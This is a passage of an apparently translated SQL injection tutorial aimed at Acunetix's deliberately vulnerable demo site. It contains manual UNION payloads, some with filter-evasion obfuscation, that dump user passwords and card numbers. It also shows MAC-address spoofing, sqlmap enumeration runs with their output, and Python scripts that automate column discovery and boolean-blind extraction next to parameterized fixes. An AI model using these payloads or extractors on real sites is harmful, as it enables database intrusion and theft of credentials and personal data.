group_concat(table_name,0x3c62723e) from information_schema.tables
Let's list all the tables of the current database (table_schema=database()).
Type the line below as a single line:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(table_name,0x3c62723e) from information_schema.tables
where table_schema=database()
Let's list all the columns of the users table.
Type the line below as a single line:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(column_name) from information_schema.columns where table_name='users'
At the link below we convert the colon ( : ) to its hex value, 0x3a:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
With the columns known, we'll display the data found in the uname and pass columns of
the users table.
Type the line below as a single line:
http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
concat(uname,0x3a,pass) from users
Login : test
Password: test
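The root cause of everything shown in this section is that artists.php concatenates the artist parameter straight into its SQL. The script below, an added example rather than the lab's own PHP code, rebuilds that lookup on an in-memory SQLite table (constructed here; sqlite_version() stands in for MySQL's version()) and runs the same probes against the vulnerable form and against the fixed form that validates the type and binds the value as a parameter.

```python
"""artists.php-style lookup, vulnerable and fixed, run against the lab's probes.

Added example, not the lab's code. Table, rows and probes are constructed here.
"""
from __future__ import annotations

import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the lab database: three columns, like artists.php."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE artists (artist_id INTEGER, aname TEXT, adesc TEXT)")
    con.executemany(
        "INSERT INTO artists VALUES (?, ?, ?)",
        [(1, "r4w8173", "Lorem ipsum..."), (2, "Blad3", "Dolor sit amet")],
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, artist: str) -> list[tuple]:
    """What the lab does: the raw parameter is concatenated into the query,
    so anything after the number becomes part of the SQL."""
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id=" + artist
    return con.execute(sql).fetchall()


def lookup_fixed(con: sqlite3.Connection, artist: str) -> list[tuple]:
    """Fix: validate the type, then bind the value as a parameter. The driver
    passes the value separately from the SQL text, so it can never become SQL."""
    try:
        artist_id = int(artist)
    except ValueError:
        raise ValueError("artist must be an integer id") from None
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id=?"
    return con.execute(sql, (artist_id,)).fetchall()


def probe(con: sqlite3.Connection, fn, artist: str) -> str:
    """Run one probe through fn and summarise the outcome as a short tag."""
    try:
        rows = fn(con, artist)
    except sqlite3.OperationalError:
        return "sql-error"  # the 1' probe: a database error page = injectable
    except ValueError:
        return "rejected"   # input validation refused the value
    return "rows:%d" % len(rows)


# The lab's probes in order: a normal id, the single quote, and the UNION with
# a non-existent id (the page's `100 union all select 1,2,version()`).
PROBES = ["1", "1'", "100 union all select 1,2,sqlite_version()"]


def run_all(con: sqlite3.Connection) -> dict[str, tuple[str, str]]:
    """probe -> (outcome against vulnerable code, outcome against fixed code)."""
    return {p: (probe(con, lookup_vulnerable, p), probe(con, lookup_fixed, p)) for p in PROBES}


def leaked_value(con: sqlite3.Connection) -> str:
    """The leak itself: the third column of the UNION result is the DB version."""
    rows = lookup_vulnerable(con, PROBES[2])
    return rows[0][2]


if __name__ == "__main__":
    con = make_db()
    for p, (vuln, fixed) in run_all(con).items():
        print(f"{p!r:45} vulnerable={vuln:10} fixed={fixed}")
    print("leaked via UNION:", leaked_value(con))
```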
07 - Some more manual injection command examples
Type the line below as a single line:
http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,concat('Versao ===> ',' :: ',version())--
----------------------------------------------
Type the line below as a single line:
http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,(select+count(column_name) from information_schema.columns)
----------------------------------------------
Type the line below as a single line:
http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,(select count(table_name) from information_schema.tables)
http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
FROM information_schema.columns WHERE table_schema=database()
GROUP BY table_name LIMIT 0,1
http://testphp.vulnweb.com/artists.php?artist=100
/*!50000uNiOn*/ /*!50000select*/ all 1,2,/*!50000 group_concat(table_name)*/
/*!50000from*/ information_schema.tables where table_schema=database()
http://testphp.vulnweb.com/artists.php?artist=100 /*!50000uNiOn*/
/*!50000select*/all 1,2,/*!50000 gRoUp_cOnCat(table_name,0x3c62723e)*/ /*!50000
from*/ information_schema.tables where table_schema=database()
http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)
where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Vuln column: 3
http://testphp.vulnweb.com/artists.php?artist=-1
/*!50000union*/ /*!50000select*/ 1,2,database()
http://testphp.vulnweb.com/artists.php?artist=-1
/*!50000union*/ /*!50000select*/ 1,2,user()
http://testphp.vulnweb.com/artists.php?artist=-1
union select 1,pass,cc FROM users WHERE uname='test'
Vuln column:7
http://testphp.vulnweb.com/listproducts.php?cat=3
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
union all select 1,2,3,4,5,6,'<< Coluna 7 esta vulneravel >>',8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
and 1 = 0 union select 1,2,3,4,5,6,version(),8,9,10,11-- -
Vuln columns:7 and 11
http://testphp.vulnweb.com/listproducts.php?cat=-1
union select 1,2,3,4,5,6,version(),8,9,10,user()
http://testphp.vulnweb.com/listproducts.php?cat=3
/*!50000%55nIoN*/ /*!50000%53eLeCt*/ 1,2,3,4,5,6,7,8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
/**//*!12345UNION SELECT*//**/ 1,2,3,4,5,6,7,8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
/*--*/union/*--*/select/*--*/ 1,2,3,4,5,6,7,8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
/*!u%6eion*/ /*!se%6cect*/ 1,2,3,4,5,6,7,8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
/**/union/*!50000select*//**/ 1,2,3,4,5,6,7,8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=-1
union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 from
information_schema.columns where table_schema=database() and table_name='users'--+
http://testphp.vulnweb.com/listproducts.php?cat=-1
union all select 1,group_concat('User : ',uname,' Password: ',pass,
' Phone: ',cc,' Email: ',email),3,4,5,6,7,8,9,10,11 from users--+
http://testphp.vulnweb.com/listproducts.php?cat=-1
union select 'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8',
'vuln9','vuln10','vuln11'
Vuln column: 1379
http://testphp.vulnweb.com/product.php?pic=-1
and 1 = 0 union select 1,'Vuln 2','Vuln 3',4,5,6,'Vuln 7',8,'Vuln 9',10,11--
http://testphp.vulnweb.com/product.php?pic=-1
and 1 = 0 union select 1,version(),user(),4,5,6,'Vuln 7===',8,database(),10,11--
http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,(select count(table_name) from information_schema.tables)
http://testphp.vulnweb.com/product.php?pic=-1
and 1 = 0 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11
FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 115)--
http://testphp.vulnweb.com/listproducts.php?cat=-1
union select 1,2,3,4,5,6,concat(uname,0x3a,pass,0x3a,email,0x3a,name),8,9,10,11
from users
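The payloads above all follow one procedure: find how many columns the original query selects (ORDER BY n, or UNION SELECT 1,2,3,...), find which of those columns the page actually echoes (the 'vuln1'...'vuln11' markers), then place group_concat(...) in that column with a non-matching id so only the injected rows are shown. The script below is an added example, not code from this page or from the test site: it replays that procedure offline against a constructed SQLite stand-in for a listproducts.php?cat= style query (table contents, the render function and the 3-column layout are assumptions) and puts the string-built query next to its parameterized form. MySQL-only helpers such as version(), user() and information_schema are left out because SQLite has no equivalent.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the acuart schema: a products table the page reads
    from and a users table the attacker is after (all rows are invented)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER, cat INTEGER, name TEXT, price INTEGER);
        INSERT INTO products VALUES (1, 3, 'painting', 120), (2, 3, 'print', 40),
                                    (3, 1, 'sculpture', 900);
        CREATE TABLE users(uname TEXT, pass TEXT, cc TEXT, email TEXT);
        INSERT INTO users VALUES ('test', 'test', '4111-0000-0000-0000', 'test@example.com');
    """)
    return con


def list_products_vulnerable(con, cat):
    """Same defect as listproducts.php?cat=: the parameter is spliced into the SQL text."""
    return con.execute(f"SELECT id, name, price FROM products WHERE cat={cat}").fetchall()


def list_products_safe(con, cat):
    """Hardened form: the value is bound, so a UNION payload is only a non-matching string."""
    return con.execute("SELECT id, name, price FROM products WHERE cat=?", (cat,)).fetchall()


def render_page(rows):
    """Assumed page template: only the product name (query column 2) is echoed."""
    return "\n".join(str(row[1]) for row in rows)


def find_column_count(con, max_cols=20):
    """ORDER BY n fails as soon as n exceeds the number of selected columns."""
    for n in range(1, max_cols + 1):
        try:
            list_products_vulnerable(con, f"3 ORDER BY {n}-- -")
        except sqlite3.Error:
            return n - 1
    return None


def find_reflected_columns(con, ncols):
    """UNION in distinct markers ('vuln1','vuln2',...) and see which ones reach the page."""
    markers = ",".join(f"'vuln{i}'" for i in range(1, ncols + 1))
    page = render_page(list_products_vulnerable(con, f"-1 UNION SELECT {markers}-- -"))
    return [i for i in range(1, ncols + 1) if f"vuln{i}" in page]


def dump_users(con, ncols, reflected_col):
    """Put group_concat(...) in the reflected column; cat=-1 empties the legitimate rows."""
    cols = ["NULL"] * ncols
    cols[reflected_col - 1] = "group_concat(uname || ':' || pass || ':' || cc || ':' || email)"
    payload = f"-1 UNION SELECT {','.join(cols)} FROM users-- -"
    return render_page(list_products_vulnerable(con, payload))


if __name__ == "__main__":
    con = build_db()
    n = find_column_count(con)
    reflected = find_reflected_columns(con, n)
    print("columns:", n, "reflected:", reflected)
    print("dump:", dump_users(con, n, reflected[0]))
    # the same payload against the parameterized query matches nothing
    print("safe:", list_products_safe(con, "-1 UNION SELECT NULL,uname,NULL FROM users-- -"))
```

The safe variant still receives the full payload string; it simply travels as a bound value that SQLite compares against the integer cat column, so no row matches and no second SELECT is ever parsed.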
08 - Kali Linux - Downloading and Installing
Kali Linux is an advanced operating system (OS) that ships many tools for security
testing (penetration testing); these tests are run to find flaws in operating systems,
networks, web applications and much more. It is entirely based on Debian, another
Linux-derived operating system.
Its predecessor was BackTrack Linux. Kali Linux is the rebirth of BackTrack: the new
Kali set out to be the most robust, advanced and stable penetration-testing
distribution, providing more than 300 tools and a modified kernel, and it is fully
customizable.
Let's download Kali so we can redo the manual injection examples, this time with
Kali's sqlmap tool.
https://www.kali.org/
https://www.kali.org/downloads/
Downloading Kali Linux image file ( iso )
Watch the step by step movie showing how to install Kali on your VirtualBox.
I have already shown the step-by-step installation of Debian Linux, and Kali installs
in exactly the same way. :)
Username: root
Password: 123
Click the icon on the left to open the terminal.
If you prefer to reach the terminal through PuTTY or the macOS terminal, we first need
to start the ssh service.
service ssh start ( enter )
If you use Kali's own terminal, the line above is not needed.
ifconfig ( enter )
Updating the system.
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y ( enter )
Let's start the ssh service so we can connect through PuTTY or the macOS terminal.
service ssh start ( enter )
Keep in mind that a root account with the password 123 is now reachable over SSH, so
keep this VM on an isolated (host-only) lab network.
09 - Kali - Sqlmap
Now let's reproduce the "Manual SQL Injection" example using the sqlmap tool from Kali
Linux.
SqlMap
sqlmap is a SQL injection tool written in Python. Its goal is to detect and exploit SQL
injection vulnerabilities in web applications and sites; once one or more injections
are confirmed on a target, the user can choose among the many options sqlmap offers to
explore the data stored in that system's database, such as extracting the list of
users, passwords, privileges, tables and much more.
----------------------------------------------
Law 12.737/2012, Art. 154-A
Breaking into another person's computing device, whether or not connected to a
computer network, by improperly circumventing a security mechanism and with the aim
of obtaining, tampering with or destroying data or information without the express or
tacit authorization of the device's owner, or installing vulnerabilities to obtain an
illicit advantage:
Penalty – detention, from 3 (three) months to 1 (one) year, and a fine.
Law No. 12.737, of 30 November 2012.
----------------------------------------------
In the Kali terminal, type the commands below to change the MAC address.
ifconfig eth0 down
macchanger -m 02:33:4A:B5:6C:D7 eth0
Permanent MAC: e8:94:f6:1c:0e:8b (unknown)
Current MAC: 02:33:4a:b5:6c:e7 (unknown)
New MAC: 02:33:4a:b5:6c:d7 (unknown)
ifconfig eth0 up
In practice...
----------------------------------------------
Let's use the Kali Linux tool called sqlmap to find the SQL injection vulnerabilities.
(testphp.vulnweb.com is Acunetix's deliberately vulnerable demo site, which is what
makes it a legitimate target for these examples; the legal disclaimer sqlmap prints
below applies to everything else.)
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. Developers assume no liability and are not responsible for any misuse
or damage caused by this program
[*] starting at 21:25:44
[21:25:45] [INFO] testing connection to the target URL
[21:25:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:25:46] [INFO] testing if the target URL is stable
[21:25:47] [INFO] target URL is stable
[21:25:47] [INFO] testing if GET parameter 'artist' is dynamic
[21:25:47] [INFO] confirming that GET parameter 'artist' is dynamic
[21:25:48] [INFO] GET parameter 'artist' is dynamic
[21:25:48] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be
injectable (possible DBMS: 'MySQL')
[21:25:48] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific
for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n] y
[21:25:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:26:02] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind -
WHERE or HAVING clause' injectable
[21:26:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause'
[21:26:02] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause'
[21:26:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:26:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:26:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (UPDATEXML)'
[21:26:04] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (UPDATEXML)'
[21:26:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXP)'
[21:26:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[21:26:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:26:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause
(BIGINT UNSIGNED)'
[21:26:06] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[21:26:06] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[21:26:07] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:26:09] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[21:26:10] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[21:26:10] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[21:26:11] [INFO] testing 'MySQL inline queries'
[21:26:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:26:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[21:26:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[21:26:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[21:26:24] [INFO] GET parameter 'artist' seems to be 'MySQL >= 5.0.12 AND time-based
blind (SELECT)' injectable
[21:26:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:26:24] [INFO] automatically extending ranges for UNION query injection technique
tests as there is at least one other (potential) technique found
[21:26:26] [INFO] ORDER BY technique seems to be usable. This should reduce the time
needed to find the right number of query columns.
Automatically extending the range for current UNION query injection technique test
[21:26:27] [INFO] target URL appears to have 3 columns in query
[21:26:33] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20
columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[21:26:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[21:26:43] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 21:26:43
----------------------------------------------
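sqlmap found three techniques for the same parameter. The UNION one is cheap (one request returns a whole row, which is why the schema and dump runs below finish instantly), while the boolean-based payload (artist=1 AND 5701=5701) yields only one true/false answer per request and the time-based one only a delay. The script below is an added example, not sqlmap's code: it simulates artists.php?artist= over a constructed SQLite table (rows and names are invented) and recovers the test user's pass column through the boolean oracle alone, counting requests so the cost relative to a UNION dump is visible.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the two acuart tables used here (rows are invented)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE artists(artist_id INTEGER, aname TEXT);
        INSERT INTO artists VALUES (1, 'r4w8173'), (2, 'Blad3');
        CREATE TABLE users(uname TEXT, pass TEXT);
        INSERT INTO users VALUES ('test', 'test');
    """)
    return con


def artists_page(con, artist):
    """Vulnerable artists.php: the artist name appears only when the WHERE clause is true."""
    rows = con.execute(f"SELECT aname FROM artists WHERE artist_id={artist}").fetchall()
    return rows[0][0] if rows else ""


class BlindExtractor:
    """Boolean-based blind extraction: every request answers one yes/no question."""

    def __init__(self, con):
        self.con = con
        self.requests = 0
        self.baseline = artists_page(con, "1")  # what a TRUE condition looks like

    def oracle(self, condition):
        """artist=1 AND (<condition>): the page is unchanged iff the condition holds."""
        self.requests += 1
        return artists_page(self.con, f"1 AND ({condition})") == self.baseline

    def _search(self, template, lo, hi):
        """Binary search for the value v in [lo, hi]; template.format(v) asks 'x <= v'."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.oracle(template.format(mid)):
                hi = mid
            else:
                lo = mid + 1
        return lo

    def extract(self, subquery, max_len=64):
        """Recover the string a scalar subquery returns: its length, then each code point."""
        length = self._search(f"length(({subquery})) <= {{}}", 0, max_len)
        chars = []
        for i in range(1, length + 1):
            code = self._search(f"unicode(substr(({subquery}), {i}, 1)) <= {{}}", 32, 126)
            chars.append(chr(code))
        return "".join(chars)


def blind_dump_password(con):
    """Return the recovered password and the number of requests it cost."""
    ex = BlindExtractor(con)
    value = ex.extract("SELECT pass FROM users WHERE uname='test'")
    return value, ex.requests


if __name__ == "__main__":
    secret, cost = blind_dump_password(build_db())
    print(f"pass={secret!r} recovered with {cost} requests")
```

A four-character value costs roughly thirty requests here (about seven per printable character plus a few for the length); a real dump of the users table multiplies that by every cell, which is why sqlmap prefers UNION or error-based channels whenever it finds one and falls back to --threads for the blind ones.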
Let's list the databases.
--dbs = list databases
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs
[*] starting at 21:59:28
[21:59:28] [INFO] resuming back-end DBMS 'mysql'
[21:59:29] [INFO] testing connection to the target URL
[21:59:30] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[21:59:30] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[21:59:30] [INFO] fetching database names
[21:59:30] [INFO] the SQL query used returns 2 entries
[21:59:30] [INFO] resumed: information_schema
[21:59:30] [INFO] resumed: acuart
available databases [2]:
[*] acuart
[*] information_schema
[21:59:30] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 21:59:30
----------------------------------------------
-D acuart = the database
--tables = list tables
----------------------------------------------
Listing all tables of the acuart database.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
[*] starting at 22:02:11
[22:02:11] [INFO] resuming back-end DBMS 'mysql'
[22:02:11] [INFO] testing connection to the target URL
[22:02:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:02:15] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:02:15] [INFO] fetching tables for database: 'acuart'
[22:02:15] [INFO] the SQL query used returns 8 entries
[22:02:15] [INFO] resumed: artists
[22:02:15] [INFO] resumed: carts
[22:02:15] [INFO] resumed: categ
[22:02:15] [INFO] resumed: featured
[22:02:15] [INFO] resumed: guestbook
[22:02:15] [INFO] resumed: pictures
[22:02:15] [INFO] resumed: products
[22:02:15] [INFO] resumed: users
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
[22:02:15] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:02:15
----------------------------------------------
Listing all tables and columns of the acuart database.
--tables = list tables
--columns = list columns
----------------------------------------------
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --columns
[*] starting at 22:15:25
[22:15:25] [INFO] resuming back-end DBMS 'mysql'
[22:15:25] [INFO] testing connection to the target URL
[22:15:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:15:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:15:27] [INFO] fetching tables for database: 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: artists
[22:15:27] [INFO] resumed: carts
[22:15:27] [INFO] resumed: categ
[22:15:27] [INFO] resumed: featured
[22:15:27] [INFO] resumed: guestbook
[22:15:27] [INFO] resumed: pictures
[22:15:27] [INFO] resumed: products
[22:15:27] [INFO] resumed: users
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
[22:15:27] [INFO] fetching columns for table 'artists' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "artist_id","int(5)"
[22:15:27] [INFO] resumed: "aname","varchar(50)"
[22:15:27] [INFO] resumed: "adesc","text"
[22:15:27] [INFO] fetching columns for table 'carts' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "cart_id","varchar(100)"
[22:15:27] [INFO] resumed: "price","int(11)"
[22:15:27] [INFO] resumed: "item","int(11)"
[22:15:27] [INFO] fetching columns for table 'categ' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "cat_id","int(5)"
[22:15:27] [INFO] resumed: "cname","varchar(50)"
[22:15:27] [INFO] resumed: "cdesc","tinytext"
[22:15:27] [INFO] fetching columns for table 'featured' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 2 entries
[22:15:27] [INFO] resumed: "pic_id","int(11)"
[22:15:27] [INFO] resumed: "feature_text","text"
[22:15:27] [INFO] fetching columns for table 'guestbook' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "sender","varchar(150)"
[22:15:27] [INFO] resumed: "mesaj","text"
[22:15:27] [INFO] resumed: "senttime","int(32)"
[22:15:27] [INFO] fetching columns for table 'pictures' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: "pic_id","int(5)"
[22:15:27] [INFO] resumed: "pshort","mediumtext"
[22:15:27] [INFO] resumed: "plong","text"
[22:15:27] [INFO] resumed: "price","int(11)"
[22:15:27] [INFO] resumed: "cat_id","int(11)"
[22:15:27] [INFO] resumed: "a_id","int(11)"
[22:15:27] [INFO] resumed: "title","varchar(100)"
[22:15:27] [INFO] resumed: "img","varchar(50)"
[22:15:27] [INFO] fetching columns for table 'products' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 5 entries
[22:15:27] [INFO] resumed: "id","int(10) unsigned"
[22:15:27] [INFO] resumed: "name","text"
[22:15:27] [INFO] resumed: "rewritename","text"
[22:15:27] [INFO] resumed: "description","text"
[22:15:27] [INFO] resumed: "price","int(10) unsigned"
[22:15:27] [INFO] fetching columns for table 'users' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: "uname","varchar(100)"
[22:15:27] [INFO] resumed: "pass","varchar(100)"
[22:15:27] [INFO] resumed: "cc","varchar(100)"
[22:15:27] [INFO] resumed: "address","mediumtext"
[22:15:27] [INFO] resumed: "email","varchar(100)"
[22:15:27] [INFO] resumed: "name","varchar(100)"
[22:15:27] [INFO] resumed: "phone","varchar(100)"
[22:15:27] [INFO] resumed: "cart","varchar(100)"
Database: acuart
Table: categ
[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| cat_id | int(5) |
| cdesc | tinytext |
| cname | varchar(50) |
+--------+-------------+
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+
Database: acuart
Table: carts
[3 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| cart_id | varchar(100) |
| item | int(11) |
| price | int(11) |
+---------+--------------+
Database: acuart
Table: pictures
[8 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| a_id | int(11) |
| cat_id | int(11) |
| img | varchar(50) |
| pic_id | int(5) |
| plong | text |
| price | int(11) |
| pshort | mediumtext |
| title | varchar(100) |
+--------+--------------+
Database: acuart
Table: featured
[2 columns]
+--------------+---------+
| Column | Type |
+--------------+---------+
| feature_text | text |
| pic_id | int(11) |
+--------------+---------+
Database: acuart
Table: products
[5 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| description | text |
| id | int(10) unsigned |
| name | text |
| price | int(10) unsigned |
| rewritename | text |
+-------------+------------------+
Database: acuart
Table: artists
[3 columns]
+-----------+-------------+
